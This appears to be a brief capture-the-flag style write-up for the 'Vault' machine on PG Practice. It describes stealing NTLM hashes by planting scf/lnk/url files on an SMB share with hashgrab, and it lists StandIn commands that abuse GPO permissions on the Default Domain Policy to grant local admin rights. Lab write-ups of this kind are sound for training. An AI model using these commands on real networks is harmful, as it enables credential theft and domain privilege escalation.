Stealing Hashes with Responder, GPO Permissions & Unintended Ways – Vault @ PG Practice
We are solving Vault from PG Practice. This machine involves planting malicious files on an SMB share to steal hashes. For root, we will abuse GPO Permissions and explore 2 unintended privilege escalations.
Notes
Creating scf/lnk/url files via hashgrab:
python3 ~/tools/hashgrab/hashgrab.py <ip> xct
GPO Abuse via standin:
.\standin --gpo
.\standin --gpo --filter "Default Domain Policy" --acl
.\standin --gpo --filter "Default Domain Policy" --localadmin anirudh
cmd /c "gpupdate /force"
Other resources: